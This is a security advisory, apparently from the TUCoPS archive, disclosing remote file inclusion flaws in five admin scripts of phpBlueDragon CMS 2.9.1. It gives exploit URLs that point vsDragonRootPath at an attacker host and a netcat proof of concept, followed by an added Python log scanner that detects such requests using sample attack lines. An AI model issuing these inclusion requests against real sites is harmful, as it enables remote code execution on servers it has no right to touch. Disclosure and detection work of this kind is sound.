

TUCoPS :: Web :: CMS / Portals :: b06-3249.htm

phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln






PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/

Affected files:
root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/

Solution:

None

Simple PoC:

nc -l -p 9999
...
http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/
...
$ nc -l -p 9999
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0
Host: 192.168.0.xx:9999

HTTP/0.9 200 OK


...
System 	OpenBSD xxx 3.9 xxx i386
...
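As an added example (not part of shm's advisory), a small Python scanner that flags access-log requests in which vsDragonRootPath carries a URL scheme or directory traversal instead of a local path; the log lines, client addresses and the 203.0.113.10 host are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log lines (combined format), not taken from the advisory;
# 203.0.113.10 is a documentation-range address standing in for the attacker's host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2006:10:01:02 +0000] "GET /root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://203.0.113.10:9999/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
10.0.0.6 - - [12/Jun/2006:10:01:03 +0000] "GET /root_includes/root_modules/team_admin.php?action=move_item&vsDragonRootPath=..%2F..%2F HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.7 - - [12/Jun/2006:10:01:04 +0000] "GET /index.php?page=forum HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
10.0.0.8 - - [12/Jun/2006:10:01:05 +0000] "GET /root_includes/root_modules/rss_admin.php?action=move_item&vsDragonRootPath=%68ttp%3A%2F%2F203.0.113.10%2F HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

# client, method, request target and status from a combined-format line
_LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Any URL scheme at the start of the value: PHP include() fetches through whichever
# stream wrapper is enabled (http:, https:, ftp:, php:, data:, ...), not only http.
_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]+:")

def classify_root_path(value: str) -> str:
    """Classify a decoded vsDragonRootPath value as 'remote_url', 'traversal' or 'local'."""
    v = value.strip()
    if _SCHEME_RE.match(v) or v.startswith(("//", "\\\\")):
        return "remote_url"  # http://host/, php://input, data:..., //host/share
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"   # ../../ climbs out of the intended root
    return "local"

def scan_access_log(log_text: str) -> list:
    """Return one finding per request whose vsDragonRootPath is not a plain local path.
    Only the query string is logged, so POSTed parameters are out of scope here;
    parse_qs percent-decodes, so %68ttp%3A%2F%2F... is classified as http://..."""
    findings = []
    for line in log_text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for value in parse_qs(parts.query, keep_blank_values=True).get("vsDragonRootPath", []):
            kind = classify_root_path(value)
            if kind != "local":
                findings.append({"client": m.group("client"), "script": parts.path,
                                 "value": value, "kind": kind, "status": m.group("status")})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['client']} {f['kind']:10} {f['script']} <- {f['value']}")
```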
=0D
Credits:
shm 

